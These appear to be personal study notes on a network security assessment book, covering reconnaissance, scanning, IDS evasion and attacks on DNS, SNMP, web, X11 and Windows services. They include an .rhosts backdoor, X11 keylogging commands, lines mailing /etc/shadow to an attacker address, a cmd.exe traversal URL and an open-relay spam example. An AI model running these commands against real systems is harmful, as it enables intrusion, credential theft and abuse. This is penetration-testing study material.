├── NSA.txt └── README.md /NSA.txt: -------------------------------------------------------------------------------- 1 | CHAPTER 1 - Network Security Assessment 2 | 3 | Internet Based Attackers 4 | Opportunistic attackers who scour large Internet address spaces for vulnerable systems 5 | Focused attackers who attack select Internet-based systems with a specific goal in mind 6 | 7 | Defender’s dilemma 8 | A defender must ensure the integrity of every point of entry, whereas an attacker only needs to gain access through one to be successful 9 | 10 | A Zero-day bug has a lifespan of 348 days before a vendor patch is made available 11 | 12 | The Cyclic Assessment Approach 13 | 14 | 15 | ---------------------------------------------------------------------------------------------------------------------------------------------------------------- 16 | 17 | CHAPTER 2 - Network Security Assessment Platform 18 | 19 | Reconnaissance Tools 20 | BiDiBLAH - Windows 21 | 22 | Network Scanning Tools 23 | Nmap 24 | Nessus 25 | Commercial tools - ISS Internet Scanner, eEye Scanner, QualysGuard and Matta Colossus ( A LOT OF FALSE+) 26 | 27 | Exploitation Framework 28 | Metasploit 29 | Commercial tools - CORE IMPACT and Immunity CANVAS 30 | 3rd Party - Argeniss and GLEG ( Zero Day Exploit Pack) 31 | 32 | Web Application Testing Tools 33 | Proxy Based - Paros, WebScarab and Burp 34 | Active - Wapiti and Nikto 35 | Commercial - WatchFire Appscan, SPI Dynamics WebInpect and Cenzic Hailstorm 36 | 37 | ---------------------------------------------------------------------------------------------------------------------------------------------------------------- 38 | 39 | CHAPTER 3 - Internet Host and Network Enumeration 40 | 41 | Open Source info 42 | Indirect 43 | Web and newsgroup search engines 44 | Domain and IP WHOIS registrars 45 | Border Gateway Protocol (BGP) looking glass sites and route servers 46 | Public DNS name servers 47 | Direct 48 | DNS querying and grinding against specific name servers 49 | Web server crawling 50 | SMTP probing 51 | 52 | Querying Web and Newsgroup Search Engines 53 | Google Search Functionality - Contact Details, Search Query(Dork), Newsgroups, Netcraft 54 | 55 | Domain WHOIS Registars (TLD) 56 | Administrator Details - whois 57 | 58 | IP WHOIS Registars (RIR) 59 | Regional Internet Registries (RIR) 60 | American Registry for Internet Numbers (ARIN) 61 | Réseaux IP Européens (RIPE) 62 | Asia Pacific Network Information Centre (APNIC) 63 | Latin American and Caribbean Network Information Centre (LACNIC) 64 | African Network Information Centre (AfrNIC) 65 | 66 | IP WHOIS Querying Tools - whois 67 | Enumerate Objects for a given target 68 | $ whois nintendo -h whois.arin.net # Enum Nintendo object in ARIN 69 | Harvest User details 70 | $ whois "@mitre.org" -h whois.arin.net # Enum MITRE Corporation staff through ARIN 71 | Enum maintainer Object 72 | $ whois cs-security-mnt # Enumerating the cs-security-mnt object from RIPE 73 | 74 | BGP Querying 75 | FixedOrbit 76 | 77 | DNS Querying - Reverse DNS sweep 78 | Nslookup, Host and Dig - Details on Name Server(NS), Domain and Sub-Domain, Hostname, Mail Exchanger(MX) 79 | 80 | Forward DNS Querying - nslookup, dig 81 | NSLOOKUP # Enumbasic domain details 82 | $ nslookup 83 | > set querytype=any 84 | > cia.gov 85 | 86 | DNS Zone Transfer Techniques - host, dig, nslookup 87 | HOST 88 | $ host -l ucia.gov # Enum authoritative name servers for zone transfer 89 | DIG 90 | $ dig @relay2.ucia.gov ucia.gov axfr # DNS Zone Transfer - Int/Ext IP, 91 | $ dig @relay2.ucia.gov 129.81.198.in-addr.arpa axfr # Enum PTR 92 | 93 | Forward DNS Grinding - Bruteforce 94 | NSLOOKUP 95 | $ nslookup # Forward DNS lookup to enumerate MX records 96 | > set querytype=mx 97 | > bankofengland.co.uk 98 | TXDNS - Windows Tool 99 | C:\tools> txdns -f mail-dict.txt bankofengland.co.uk 100 | 101 | Reverse DNS Sweeping 102 | FHBA 103 | $ ghba 198.81.129.0 104 | 105 | Web Server Crawling - Crawl and mirror 106 | Tools - Wikto, HTTrack, BlackWidow , GNU Wget 107 | 108 | Automating Enumeration - SpiderFoot and BiDiBLAH 109 | 110 | SMTP Probing 111 | Sending mail to get more details 112 | 113 | Enumeration Technique Recap 114 | Web and newsgroup searches 115 | Using Google to perform searches against established domain names and target networks to identify personnel, hostnames, domain names, and useful data residing on publicly accessible web servers. 116 | 117 | WHOIS querying 118 | Querying domain and IP registrars to retrieve network block, routing, and contact details related to the target networks and domain names. IP WHOIS querying gives useful information relating to the sizes of reserved network blocks (useful later when performing intrusive network scanning) and AS number details. 119 | 120 | BGP querying 121 | Cross-referencing AS numbers with BGP looking glass sites and route servers to enumerate the associated IP blocks under the AS, and then feeding these details back into other query paths (such as DNS or further WHOIS querying). 122 | 123 | DNS querying 124 | Querying publicly accessible DNS servers to enumerate hostnames and subdomains. Misconfigured DNS servers are also abused to download DNS zone files that categorically list subdomains, hostnames, operating platforms of devices, and internal network information in severe cases. 125 | 126 | Web server crawling 127 | Accessible web servers are crawled using automated spidering software to identify associated servers, domains, and useful information, such as web server software details, enumerated users, and email addresses. 128 | 129 | SMTP probing 130 | Sending email messages to nonexistent accounts at target domains to map internal network space by analyzing the responses from the SMTP system. 131 | 132 | ---------------------------------------------------------------------------------------------------------------------------------------------------------------- 133 | 134 | CHAPTER 4 - IP Network Scanning 135 | 136 | ICMP Probing 137 | ICMP Types 138 | Type 8 - Ping (Echo req) 139 | Type 13 - Timestamp Req 140 | Type 15 - Information Req 141 | Type 17 - Subnet Address Mask Req 142 | 143 | ICMP Tools 144 | SING 145 | $ sing -echo 192.168.0.255 # Type 8 146 | $ sing -tstamp 192.168.0.50 # Type 13 147 | $ sing -mask 192.168.0.25 # Type 17 148 | NMAP 149 | ICMPScan 150 | $ icmpscan –c -t 500 -r 1 192.168.1.0/24 151 | 152 | OS Fingerprinting Using ICMP 153 | Xprobe2 154 | $ xprobe2 -v 192.168.0.174 155 | 156 | TCP PORT SCANNING 157 | TYPES 158 | STANDARD METHOD 159 | Vanilla Connect - Full TCP 3 way handshake (nmap -sT) 160 | Half open Connect - 2 Way handshake then RST Sent (nmap -sS or scanrand 10.0.1.1-254:quick) 161 | 162 | STEALTH METHOD 163 | Inverse TCP - Send TCP Probe like FIN/XMAS(URG/PSH)/NULL. If open - no resp, closed - RST 164 | Nmap -sF FIN , -sX XMAS or -sN 165 | ACK Prob Scan - 1K ACK Sent, Check TTL or WINDOW response (nmap -sA TTL, -sW Window or hping2) 166 | 167 | 3rd Party and Spoofed Scan 168 | FTP Bounce - port scan using vulnerable FTP port (nmap -PO -b) 169 | Connect to FTP - PASV, PORT 144, LIST - if repose 226 it’s open, if 425 it’s closed 170 | Proxy bounce - use proxy to perform bounce port scan 171 | Sniffer based Spoof - same as half open, tries to use a IP in a network and tries to look for access using spoof IP 172 | IP ID header scan - use idle(zombie) host to scan the target, HPING2 or nmap -sI, Vscan 173 | 174 | PAGE 85 PORT LIST 175 | 176 | UDP PORT SCANNING 177 | port is closed only if - ICMP destination port unreachable 178 | Tools - Nmap (-sU), scanudp 179 | 180 | IDS Evasion and Filter Circumvention 181 | For Bypass IDS 182 | Fragmented Probe Packets 183 | Tool 184 | Fragtest - 8 byte-frag, frag-new, frag-old 185 | $ fragtest frag frag-new frag-old www.bbc.co.uk 186 | Fragroute - modify fragroute.conf and send icmp request 187 | $ fragroute 192.168.102.251 188 | NMAP 189 | $ nmap -sS -f 192.168.102.251 190 | 191 | Spoof multiple host 192 | $ nmap -sS -P0 -D 62.232.12.8,ME,65.213.217.241 192.168.102.251 # decoy address 193 | 194 | For Bypass Packet Filter 195 | Source Routing - Specify which gateways and routes your packets should take, limit of 40 chars for Royer Data 196 | TYPES 197 | Strict Source and Route Record (SSRR) - Any number of intermediate gateways 198 | Loose Source and Route Record (LSRR) - next address to be directly connected network 199 | Vuln can be exploited by 200 | Reversing the source route 201 | Circumventing filters and gaining access to internal hosts 202 | CVE-1999-0909 Windows NT - Offset > hops and Last hope is Internal host 203 | CVE-2006-2379 Windows 2003 and earlier gives RCE, Win 2003 and XP are secured by deafult. 204 | Tools 205 | LSRScan - b -> insert IP before host, a -> Insert IP after the host 206 | $ lsrscan 217.53.62.0/24 207 | LSRTunnel - i proxy -t target -f spoofed ip 208 | $ lsrtunnel -i 192.168.102.2 -t 217.53.62.2 -f 198.81.129.194 209 | 210 | Specific TCP or UDP source port - 53(TCP/UDP),20,80,88(TCP/UDP)(Kerberos) 211 | Nmap -g 212 | Useful Ports - UDP 500 (ISAKMP) 213 | Low-Level IP Assessment 214 | Can be done by: 215 | Analysing TCP Timestamp - Uptime of hosts 216 | Analysing Response to TCP and ICMP Probes - Permitted TCP service 217 | Running Predictability Tests - TCP seq and IP ID increment 218 | IP Fingerprinting - Host's OS 219 | 220 | Analysing Response of TCP Probe 221 | 1. TCP SYN/ACK - Open 222 | 2. TCP RST/ACK - Rejected by host or firewall(sec) 223 | 3. ICMP Type 3 Code 13 - Prohibited connection 224 | 4. Nothing - Intermediary Security device silently dropped it 225 | Tools 226 | Hping2 227 | $ hping2 -c 3 -s 53 -p 139 -S 192.168.0.1 (c: Packets ; s: Source Port; d: Destination Port; S: SYN Flag; F: FIN Flag; A: ACK Flag) 228 | Firewalk 229 | States: ICMP Type 11 Code 0(Received; Passed through the filter and response will appear) 230 | Dropped (Probably done at the gateway) 231 | ICMP Type 3 Code 13 (Received; Simple filter{Router ACL} is being used) 232 | 233 | $ firewalk -n -S21,22,23,25,53,80 -pTCP gw.test.org www.test.org 234 | -S(Ports selected) -pTCP(gateway target) 235 | 236 | Passively Monitoring ICMP Responses 237 | 1. ICMP TTL Exceeded(T11 C0) - Indicate a Routing Loop 238 | 2. ICMP Administratively Prohibited (T3 C13) - Firewall/Router rejects packet 239 | 240 | IP Fingerprinting 241 | Nmap - $ nmap -O -sS 192.168.0.65 242 | 243 | TCP Sequence and IP ID Incrementation 244 | Nmap - $ nmap -v -sS -O 192.168.102.251 245 | 246 | Network Scanning Recap 247 | ICMP scanning and probing 248 | By launching an ICMP ping sweep, you can effectively identify poorly protected hosts (as security-conscious administrators filter inbound ICMP messages) and perform a degree of operating system fingerprinting and reconnaissance by analyzing responses to the ICMP probes. 249 | 250 | Half-open SYN flag TCP port scanning 251 | A SYN port scan is often the most effective type of port scan to launch directly against a target IP network space. SYN scanning is extremely fast, allowing you to scan large networks quickly. 252 | 253 | Inverse TCP port scanning Inverse scanning types (particularly FIN, XMAS, and NULL) take advantage of idiosyncrasies in certain TCP/IP stack implementations. This scanning type isn’t effective when scanning large network spaces, although it is useful when testing and investigating the security of specific hosts and small network segments. 254 | 255 | Third-party TCP port scanning 256 | Using a combination of vulnerable network components and TCP spoofing, third-party TCP port scans can be effectively launched. Scanning in this fashion has two benefits: hiding the true source of a TCP scan and assessing the filters and levels of trust between hosts. Although time-consuming to undertake, third party scanning is extremely useful when applied correctly. 257 | 258 | UDP port scanning Identifying accessible 259 | UDP services can be undertaken easily only if ICMP type 3 code 3 (“Destination port unreachable”) messages are allowed back through filtering mechanisms that protect target systems. UDP services can sometimes be used to gather useful data or directly compromise hosts (the DNS, SNMP, TFTP, and BOOTP services in particular). 260 | 261 | IDS evasion and filter circumvention 262 | Intrusion detection systems and other security mechanisms can be rendered ineffective by using multiple spoofed decoy hosts when scanning or by fragmenting probe packets using Nmap or fragroute. Filters such as firewalls, routers, and even software (including the Microsoft IPsec filter) can sometimes be bypassed using specific source TCP or UDP ports, source routing, or stateful attacks. 263 | 264 | ---------------------------------------------------------------------------------------------------------------------------------------------------------------- 265 | 266 | CHAPTER 5 - Assessing Remote Information Services5 267 | 268 | PAGE 104 - Remote Information Services 269 | 270 | DNS 271 | UDP 53 - Standard Direct Requests (Resolve Names to IP and vice versa) 272 | TCP 53 - Serve Information during zone transfers and other queries 273 | 274 | Retrieving DNS Service Version Information 275 | $ dig @nserver.apple.com version.bind chaos txt # DiG to glen BIND Version Info 276 | $ nslookup # NSLOOKUP to get BIND Version Info 277 | > server nserver.apple.com 278 | > set class=chaos 279 | > set type=txt 280 | > version.bind 281 | 282 | BIND Vulnerabilities 283 | PAGE 106 284 | CVE-2002-2211 and CVE-2006-0527(HP-UX and Tru64 servers) were DNS BIND Vuln affected by Cache Corruption 285 | 286 | Microsoft DNS Service Vulnerabilities 287 | Remote vulnerabilities in Microsoft DNS and WINS services 288 | PAGE 107 289 | 290 | DNS Zone Transfers 291 | $ dig @relay2.ucia.gov ucia.gov axfr # DiG to perform DNS Zone Transfer 292 | 293 | Reverse DNS Querying 294 | Check Point Firewall-1 -> Allows any to any rule 295 | $ nslookup # Extract Internal Host info through DNS 296 | > set querytype=any 297 | > server 144.51.5.2 298 | Using GHBA 299 | $ cat /etc/resolv.conf # Automate Reverse Lookup using GHBA 300 | nameserver 144.51.5.2 301 | $ ghba 192.168.1.0 302 | 303 | Forward DNS Grinding 304 | C:\tools> txdns -f smalllist.txt -s 17.254.0.50 apple.com # Forward DNS Grinding using TXDNS.exe 305 | 306 | Finger (TCP-79 Cisco IOS Routers and Solaris) 307 | $ telnet 192.168.0.1 79 # Cisco 308 | $ finger @192.168.0.10 # Solaris 309 | 310 | Finger Information Leaks 311 | $ finger '1 2 3 4 5 6 7 8 9 0'@192.168.0.10 #User Details through solaris fingerd 312 | $ finger user@192.168.189.12 # User details through standard Finger 313 | 314 | Finder Redirection 315 | $ finger @192.168.0.10@217.34.17.20 # Bounce attack to find internal IP details 316 | 317 | Finger Process Manipulation Vulnerabilities 318 | Few Cfingerd are vulnerable to BOF Attacks 319 | 320 | Auth (ident TCP-113) 321 | IRC Server uses ident request 322 | $ nmap -I -sT 192.168.0.10 # Nmap 323 | 324 | Auth Process Manipulation Vulnerabilities 325 | Linux jidentd and cidentd are vulnerable to BOF 326 | 327 | NTP (UDP - 123) 328 | Obtain remote hostname, NTP daemon Version, OS details including processors 329 | 330 | NTP Fingerprinting 331 | $ perl ntp.pl -t 192.168.66.202 # OS fingerprinting using ntp.pl 332 | $ perl ntp.pl -t pingo # Enum Linux Sys details using ntp.pl 333 | 334 | NTP Vulnerabilities 335 | CVE-2001-0414 - BOF NTP daemon <=4.0.99K 336 | GLEG VulnDisco - 0 Day NTP 4.2.0 337 | 338 | SNMP (UDP - 161) 339 | Management Information Base (MIB) - Contains list of Object Identifiers(OID) such as Routing table entries, network stats and network interface 340 | 341 | Tools 342 | ADMsnmp 343 | $ ADMsnmp 192.168.0.1 # Bruteforce SNMP Community Strings 344 | Snmpwalk 345 | $ snmpwalk -c private 192.168.0.1 # Access MIB 346 | 347 | Compromising Devices by Reading from SNMP 348 | PAGE 118 - OID Table 349 | $ snmpwalk -c public 192.168.102.251 .1.3.6.1.4.1.77.1.2.25 # Enum Win 2000 user accounts 350 | 351 | Compromising Devices by Writing to SNMP 352 | $ snmpset -r 3 -t 3 192.168.0.1 private .1.3.6.1.4.1.9.2.1.55.192.168.0.50 s "cisco-config" # Cisco 353 | $ snmpset -r 3 -t 3 192.168.0.254 private .1.3.6.1.4.1.529.9.5.4.0 s "ascend-config # Ascend 354 | 355 | SNMP Process Manipulation Vulnerabilities 356 | PAGE 120 357 | 358 | LDAP (389) 359 | $ ldapsearch -h 192.168.0.65 # If Anonymous Access is allowed 360 | $ bf_ldap # Bruteforce LDAP 361 | 362 | Active Directory Global Catalog (TCP -3268) 363 | Stores logical representation of all users, servers and devices 364 | 365 | LDAP Process Manipulation Vulnerabilities 366 | PAGE -122 367 | 368 | Rwho (UDP -513) 369 | $ rwho 192.168.189.120 370 | 371 | RPC rusers 372 | $ rpcinfo -p 192.168.0.50 373 | $ rusers -l 192.168.0.50 # Activer user details 374 | 375 | READ LAST PAGES - 124 and 125 Remote Information Services Countermeasures 376 | ---------------------------------------------------------------------------------------------------------------------------------------------------------------- 377 | ================================================================================================== 378 | ---------------------------------------------------------------------------------------------------------------------------------------------------------------- 379 | 380 | CHAPTER 6 - Assessing Web Servers 381 | 382 | Fingerprinting 383 | Manual 384 | Using HTTP HEAD 385 | $ telnet www.trustmatta.com 80 386 | HEAD / HTTP/1.0 387 | Using HTTP OPTIONS 388 | $ telnet www.trustmatta.com 80 389 | OPTIONS / HTTP/1.0 390 | PAGE 130 - HTTP OPTION Response 391 | Querying through an SSL Tunnel - SSL Tunnel to local port 80 392 | $ telnet 127.0.0.1 80 393 | HEAD / HTTP/1.0 394 | Automated 395 | Httprint 396 | 397 | Identifying and Assessing Reverse Proxy Mechanisms 398 | HTTP Methods with Specific Host (MANUAL) 399 | $ telnet www.example.org 80 400 | HEAD / HTTP/1.1 401 | Host: www.example.org 402 | $ telnet www.example.org 80 # If it supports HTTP CONNECT, GET or POST,we can connect using next one 403 | OPTIONS / HTTP/1.1 404 | Host: www.example.org 405 | 406 | HTTP CONNECT 407 | $ telnet www.example.org 80 # Proxy a connection to port 25 of maila.microsoft.com 408 | CONNECT maila.microsoft.com:25 HTTP/1.0 409 | HTTP POST 410 | $ telnet www.example.org 80 # POST Bounce 411 | POST http://maila.microsoft.com:25/ HTTP/1.0 412 | Content-Type: text/plain 413 | Content-Length: 0 414 | HTTP GET 415 | $ telnet cacheflow.example.org 80 #GET BOUNCE 416 | GET / HTTP/1.1 417 | HOST: mx4.sun.com:25 418 | HELO . 419 | MAIL FROM: spammer@alter.net 420 | RCPT TO: target@unsuspecting.com 421 | DATA 422 | Subject: Look Ma! I'm an open relay 423 | Hi, you've been spammed through an open proxy, because of a bug in The CacheOS 4 platform code. Have a great day! -Spammer 424 | . 425 | Automated HTTP Proxy Testing 426 | $ pxytest 192.108.105.34 427 | 428 | Enumerating Virtual Hosts and Web Sites 429 | Identifying Virtual Hosts 430 | Passive - Netcraft and DNS Querying 431 | Active - Web server crawling, SSL Cert Analysis and Analysis of server response 432 | Tool - Wikto 433 | Identifying Subsystems and Enabled Components 434 | Generic subsystems include: 435 | • HTTP 1.0 methods (GET, POST and HEAD) 436 | • HTTP 1.1 methods (GET, POST, HEAD, OPTIONS, PUT, DELETE, TRACE and CONNECT) 437 | • Web Distributed Authoring and Versioning (WebDAV) (PROPFIND, PROPPATCH, MKCOL, COPY, MOVE, LOCK, UNLOCK) 438 | • PHP 439 | • Basic authentication mechanisms 440 | Microsoft-specific subsystems include: 441 | • IIS sample and administrative scripts (IIS 3.0 and 4.0 - aexp3.htr Password Management script) 442 | • ASP and ASP.NET (Active Server Pages) (IIS 5.0 and 6.0) (aspnet_client/system_web) (DNASCAN) 443 | • ISAPI extensions (.printer, .ida, .htr) (PAGE 148) (WEBDAV and SEARCH) 444 | • Proprietary WebDAV extensions (MICROSOFT 200 SERVER IIS 5.0 and 6.0 - BCOPY, BDELETE, BMOVE, BPROPFIND, BPROPPATCH, NOTIFY, POLL, SUBSCRIBE, UNSUBSCRIBE) (MICROSOFT EXCHANGE 2003 SERVER - X-M-ENUMATTS) 445 | • Microsoft FrontPage (dll, exe and pwd) 446 | • Windows Media Services (CVE-2003-0349 - DLL file gives remote overflow to code execution) 447 | • Outlook Web Access (OWA) (/owa, /exchange, and /mail) 448 | • RPC over HTTP support (RPC over HTTP to communicate through an RPC proxy - RPC_CONNECT) 449 | • Enhanced authentication mechanisms (NTLM and Negotiate) 450 | $ telnet 83.142.224.21 80 T 451 | GET / HTTP/1.1 452 | Host: iis-server 453 | Authorization: Negotiate TlRMTVNTUAABAAAAB4IAoAAAAAAAAAAAAAAAAAAAAAA 454 | Apache-specific subsystems include: 455 | • OpenSSL 456 | • Apache modules (including mod_perl, mod_ssl, mod_security, mod_proxy, and mod_rewrite) 457 | Automatic - Nikto 458 | 459 | Investigating Known Vulnerabilities 460 | Generic Subsystem Vulnerabilities 461 | HTTP 1.1 Methods (CONNECT, TRACE, PUT AND DELETE) 462 | TRACE - XST (Cross site Tracing) allows Domain restriction Bypass, HTTP request-enabling 463 | 464 | WebDAV - (CVE-2002-0422 Microsoft IIS 5.0 and 5.1 Information disclosure, including internal IP address, through PROPFIND, WRITE, and MKCOL) (CVE-2000-0869 Apache 1.3.12 PROPFIND directory listing) 465 | 466 | PHP - PAGE 162 467 | 468 | Microsoft Web Server and subsystem Vulnerabilities 469 | IIS 5.0 - PAGE 164 470 | IIS 5.0 local privilege escalation exploit (CVE-2002-0869) 471 | IIS 6.0 - CVE-2007-2897 IIS 6.0 Denial of Service information leak and potential overflow and CVE-2005-2089 IIS 5.0 and 6.0 HTTP request smuggling 472 | ASP and ASP.NET - PAGE 166 - CVE-2006-0026 Priv Escla (ASP under IIS 6.0) 473 | ISAPI Extension - PAGE 167 474 | Microsoft proprietary WebDAV extensions - PAGE 167 475 | Microsoft FrontPage - Prompt with auth at author.dll (Poor Page have .pwd readble) (PAGE 169) CVE-2003-0822 (fp30reg.dll overflow) 476 | Outlook Web Access - PAGE 170 477 | 478 | Apache Web Server and Subsystem Vulnerabilities 479 | Apache HTTP Server - PAGE 171 - CVE-2002-0392 (Apache 1.3.24 chunked encoding exploit) 480 | Apache HTTP Server modules - PAGE 174 - CVE-2007-0774 (mod_jk 1.2.20 stack overflow) 481 | Apache Tomcat - PAGE 176 - CVE-2002-1394 and CVE-2002-1148 Tomcat (4.0.5) JSP source code disclosure 482 | OPENSSL- CVE-2003-0545 (OpenSSL0.9.7d double-free bug) and CVE-2002-0656 (OpenSSL 0.9.7-b2 and 0.9.6d client master key overflow) 483 | 484 | Basic Web Server Crawling 485 | Tools - Nikto, Wikto and N-Stalker 486 | Brute-force HTTP Authentication - Hydra and Brutus 487 | 488 | Web Servers Countermeasures - PAGE 183 489 | 490 | ---------------------------------------------------------------------------------------------------------------------------------------------------------------- 491 | 492 | CHAPTER 7 - Assessing Web Applications 493 | 494 | 3 Layers - Presentation Tier, Application Tier and Data Tier 495 | 496 | Web Application Profiling 497 | HTML source review (Comments, Hidden fields that are passed to scripts and Client-side scripts) 498 | Manual - 499 | $ wget -r -m -nv http://www.example.org/ # Mirror a website 500 | $ tree # Review the mirrored files then grep for HTML Elements 501 | Automatic - Sam Spade 502 | 503 | Analysis of Server-side file extensions - ASP, ASPX, PHP, etc 504 | Session ID Fingerprinting - 505 | JSESSIONID - 506 | Apache Tomcat 4.x or later (32 Upper Alphanumeric chars) 507 | Apache Tomcat 3.x or earlier (10 Lower alphanumeric chars, end with Number) 508 | Caucho Resin 3.0.21 and later (21 ASCII chars - start with abc) 509 | Caucho Resin 3.0.20 and earlier (12 ASCII chars) 510 | IBM WebSphere (23 ASCII and :) 511 | Sun Java System Application Server (28 Lower alphanumeric) 512 | 513 | Active Backend Database Technology Assessment - SQLi 514 | 515 | Web Application Attack Strategies 516 | • Server-side script variables - Change scripts in URL or form fields (Paros) 517 | • HTTP request headers - PAGE 197, Using Referer Header 518 | • HTTP cookie fields - Cookie: USER=1826cc8f:PSTYLE=../../../../../../../etc/inetd.conf 519 | • XML request content 520 | WSDL (Web Services Description Language) Enumeration 521 | Attacking via XML 522 | 523 | 524 | Filter Evasion Techniques 525 | • SSL transport to bypass web application firewalls 526 | • Encoding and obfuscating attack code - Hex coding, Double-Hex coding and HTML UTF-8 and Hex coding 527 | • HTTP request smuggling - directory traversal attack against Microsoft IIS (CVE-2000-0884) 528 | http://target/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir 529 | 530 | 531 | 532 | Web Application Vulnerabilities 533 | Authentication Issues - Default/Guessable accounts, HTTP Form Brute-Force and Session Management Weakness 534 | Parameter Modification - Command Injection, Filesystem Access and Cross-site Scripting (BeEF and XSS-Proxy) 535 | 536 | Web Security Checklist - Page 221 537 | 538 | ---------------------------------------------------------------------------------------------------------------------------------------------------------------- 539 | ================================================================================================== 540 | ---------------------------------------------------------------------------------------------------------------------------------------------------------------- 541 | 542 | CHAPTER 8 - Assessing Remote Maintenance Services 543 | 544 | Remote Maintenance Services - Info Leak, Brute Force and Process manipulation (BOF) 545 | ftp 21/tcp 546 | ssh 22/tcp 547 | telnet 23/tcp 548 | exec 512/tcp 549 | login 513/tcp 550 | shell 514/tcp 551 | x11 6000/tcp 552 | citrix-ica 1494/tcp 553 | citrix-ica-brws 1604/udp 554 | ms-rdp 3389/tcp 555 | vnc-http 5800/tcp 556 | vnc 5900/tcp 557 | 558 | FTP - FTP Banner Grabbing 559 | Brute-Force, 560 | FTP Bounce Attacks (nmap -P0 -b username:password@ftp-server:port) 561 | PORT COMMAND (1039) and PASV COMMAND Abuse (BOF) 562 | FTP Process Manipulation - (CVE-2001-0249) Valid User names via 'CWD ~username' 563 | PAGE 235,236,237 564 | 565 | SSH - Fingerprinting 566 | Brute-force Password Grinding 567 | PAGE 239 568 | 569 | Telnet - Fingerprinting - Tools such as TelnetFP (Automated) 570 | Brute-force Password Grinding - Common device telnet password 571 | PAGE 244 572 | 573 | R-Services - exec 512/tcp 574 | login 513/tcp 575 | shell 514/tcp 576 | Commands - rsh (Rsh service doesn’t assign any process ), rlogin and rexec 577 | # Simple backdoor 578 | $ echo + + > /usr/bin/.rhosts 579 | $ exit 580 | $ rsh -l bin 192.168.0.20 csh -i 581 | Brute-force - $ rsh -l bin 192.168.0.20 csh -i 582 | Spoofing RSH Connections 583 | PAGE 249 584 | 585 | X Windows - (TCP ports 6000 to 6063) 586 | Authentication Mechanism - xhost and xauth 587 | Xhost - Host-based X authentication allows users to specify which IP addresses and hosts have access to the X server. The xhost command is used with + and - options to allow and deny X access from individual hosts (i.e., xhost +192.168.189.4). 588 | Xauth - Magic Cookie is placed into the .xauthority file under the user home dir. 589 | $ xauth list 590 | $ xauth add onyx.example.org:0 MIT-MAGIC-COOKIE-1 d5d3634d2e6d64b1c078aee61ea846b5 # Creating 591 | Accessing X Servers - Tools such as xscan 592 | $ xwininfo -tree -root -display 192.168.189.66:0 | grep -i term # List Open Window 593 | $ xwd -root -display 192.168.189.66:0 | xwud # Take SS - Entire window. Also using xwatchwin 594 | $ xwd -id 0x2c00005 -display 192.168.189.66:0 | xwud # Take SS 595 | $ ./xsnoop -h 0x2c00005 -d 192.168.189.66:0 # Keylogg 596 | $ ./xspy -display 192.168.189.66:0 # Keylogg - Entire window 597 | $ ./xpusher -h 0x2c00005 -display 192.168.189.66:0mail evilhacker@hotmail.com < /etc/shadow #send keystr 598 | $ ./xtester 0x2c00005 192.168.189.66:0mail evilhacker@hotmail.com < /etc/shadow # Send keystrokes to 0x2 599 | PAGE 253 600 | 601 | Citrix (TCP 1494/UDP port 1604) - Using the Citrix ICA Client 602 | Accessing Nonpublic Published Applications - Citrix-pa-scan 603 | $ ./citrix-pa-scan 212.123.69.1 604 | PAGE 257 605 | 606 | Microsoft Remote Desktop Protocol (RDP) - TCP 3389 607 | Brute-force 608 | Vulnerabilities - CVE-2000-1149 RegAPI.DLL overflow in Windows NT 4.0 Terminal Server allows remote attackers to execute arbitrary commands via a long username. 609 | 610 | VNC (5900 Viewer/5800 HTTP) 611 | Brute-force - Vncrack and VNCrackx4 612 | Page 262 613 | 614 | ---------------------------------------------------------------------------------------------------------------------------------------------------------------- 615 | 616 | CHAPTER 9 - Assessing Database Services 617 | 618 | ms-sql 1433/tcp 619 | ms-sql-ssrs 1434/udp (SQL Server Resolution Service) 620 | ms-sql-hidden 2433/tcp 621 | oracle-tns 1521/tcp (Transparent Network Substrate) 622 | oracle-tns-alt 1526/tcp 623 | oracle-tns-alt 1541/tcp 624 | mysql 3306/tcp 625 | 626 | 627 | Microsoft SQL Server 628 | Enumeration - Using SQLPing, Metacoretex (Automatic) 629 | Brute-Force -sqlbf, SQLAT and Forcesql 630 | PAGE 268 631 | 632 | Oracle 633 | Enumeration - Pinging the TNS Listener and Information Leak attack(tnscmd.pl) 634 | PAGE 273 635 | Brute Force and Post Auth Issue - Using OAT, Metacoretex 636 | PAGE 275 637 | 638 | MYSQL 639 | Enumeration - Simple connection Netcat or Telnet 640 | Brute Force - Hydra 641 | PAGE 278- 279 642 | 643 | ---------------------------------------------------------------------------------------------------------------------------------------------------------------- 644 | ================================================================================================== 645 | ---------------------------------------------------------------------------------------------------------------------------------------------------------------- 646 | 647 | CHAPTER 10 - Assessing Windows Networking Services 648 | 649 | loc-srv 135/tcp 650 | loc-srv 135/udp 651 | netbios-ns 137/udp 652 | netbios-dgm 138/udp 653 | netbios-ssn 139/tcp 654 | microsoft-ds 445/tcp 655 | microsoft-ds 445/udp 656 | 657 | Port 135 is used for RPC client-server communication, and ports 139 and 445 are used for authentication and file sharing. UDP ports 137 and 138 are used for local NetBIOS browser, naming, and lookup functions. 658 | 659 | Microsoft RPC Services 660 | Enumeration - Tools such as epdump, rpctools (rpcdump and ifids) and Rpcscan 661 | Identify Vulnerable - PAGE 289 662 | User details via SAMR and LSARPC - Tools such as walksam and rpclient, enumdomusers 663 | Brute-Forcing Administrator Passwords - Tools such as WMICracker 664 | Enumerating System Details Through WMI - Tools such as WMIdump 665 | Executing Arbitrary Commands - Tools such as Remoxec 666 | 667 | The NetBIOS Name Service (UDP 137) 668 | Enumerating - nbtstat 669 | Attacking - CVE-2003-0661 NBNS in Windows NT 4.0, 2000, XP, and Server 2003 may include random memory in a response to a NBNS query, which can allow remote attackers to obtain sensitive information. CVE-2000-0673 NBNS doesn’t perform authentication, which allows remote attackers to cause a denial-of-service by sending a spoofed Name Conflict or Name Releasedatagram. CVE-1999-0288 Malformed NBNS traffic results in WINS crash. 670 | 671 | The NetBIOS Datagram Service (UDP 138) - CVE-2000-1079 672 | 673 | The NetBIOS Session Service 674 | Enumeration - enum, winfo and GetAcct 675 | Brute force - SMBCrack and SMB-at 676 | Authenticating with NetBIOS - net use 677 | Executing Commands - schtasks 678 | Access and Modify Registry Keys - regdmp (Dumps), regini (set and modify reg keys) and reg (Delete reg keys) 679 | Access the SAM Database - pwdump3, Cain, John, Winrtgen, Ophcrack and rainbowcrack 680 | 681 | The CIFS Service (T/U-445) 682 | Enumeration - smbdumpusers 683 | Brute Force - smbbf 684 | 685 | Unix Samba Vulnerabilities - PAGE 313 686 | 687 | Windows Networking Services Countermeasures - PAGE 313 688 | 689 | ---------------------------------------------------------------------------------------------------------------------------------------------------------------- 690 | 691 | CHAPTER 11 - Assessing Email Services 692 | 693 | 